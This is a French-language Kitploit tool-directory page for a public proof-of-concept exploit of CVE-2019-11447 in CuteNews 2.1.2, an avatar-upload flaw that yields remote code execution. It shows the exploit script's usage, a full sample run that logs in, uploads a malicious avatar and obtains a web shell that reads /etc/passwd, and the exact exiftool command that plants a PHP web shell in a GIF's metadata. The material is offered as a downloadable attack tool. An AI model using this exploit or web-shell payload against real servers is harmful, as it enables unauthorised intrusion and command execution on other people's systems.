Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-11447-POC — CuteNews 2.1.2 - Preuve de concept CVE-2019-11447 | Kitploit
Outils/GitHubGitHub/crfslick/cve-2019-11447-poc
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubcrfslick/cve-2019-11447-poc

CVE-2019-11447-POC

CuteNews 2.1.2 - Preuve de concept CVE-2019-11447

Voir le dépôt
12il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

sadnews

CuteNews 2.1.2 - Preuve de concept de CVE-2019-11447

POC par CRFSlick, découvert par AkkuS <Özkan Mustafa Akkuş>

Un problème a été découvert dans CutePHP CuteNews 2.1.2. Un attaquant peut infiltrer le serveur via le processus de téléchargement d'avatar dans la zone de profil en utilisant le champ avatar_file vers index.php?mod=main&opt=personal. Il n'y a aucun contrôle efficace de $imgsize dans /core/modules/dashboard.php. Le contenu de l'en-tête d'un fichier peut être modifié et le contrôle peut être contourné pour exécuter du code. (Un attaquant peut utiliser l'en-tête GIF pour cela.)

Utilisation

root@kitploit:~
Usage:
	CVE-2019-1144.py <username> <password> <base uri / login page>
Example:
	CVE-2019-1144.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
root@kitploit:~
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ python3 CVE-2019-11447.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
-.-. --- --- .-..    .... ....- -..- --- .-.    -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as admin:p4ssw0rd
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: 45ad06a9fc89f75e7ef046a11079c33d-admin
[+] __signature_dsi: 71e41d6500f2dc51d0606f64539f84b1
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://192.168.1.19/CuteNews/uploads/avatar_admin_5629.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR

$> whoami
www-data

$> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
Télécharger l’outil

GIF malveillant

Le GIF malveillant a été récupéré sur Internet puis modifié avec exiftool afin d'insérer le PHP nécessaire

root@kitploit:~
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool -Comment='<?php echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3RhcnRzaGVyZQ==\n\n\n"'"; echo shell_exec($_GET["'"cmd"'"]); echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0ZW5kc2hlcmU=\n\n"'";?>' sad.gif

Exiftool affichera les métadonnées de l'image dans lesquelles vous trouverez le code PHP inséré dans le commentaire

root@kitploit:~
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool sad.gif
ExifTool Version Number         : 12.05
File Name                       : sad.gif
...
Comment                         : <?php echo "\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3R...

Sources

  • https://nvd.nist.gov/vuln/detail/CVE-2019-11447
  • http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html

Avertissement

Ce projet est destiné uniquement à des fins éducatives et ne peut être utilisé pour enfreindre la loi ou pour un gain personnel. L'auteur de ce projet n'est pas responsable des éventuels dommages causés par les informations fournies.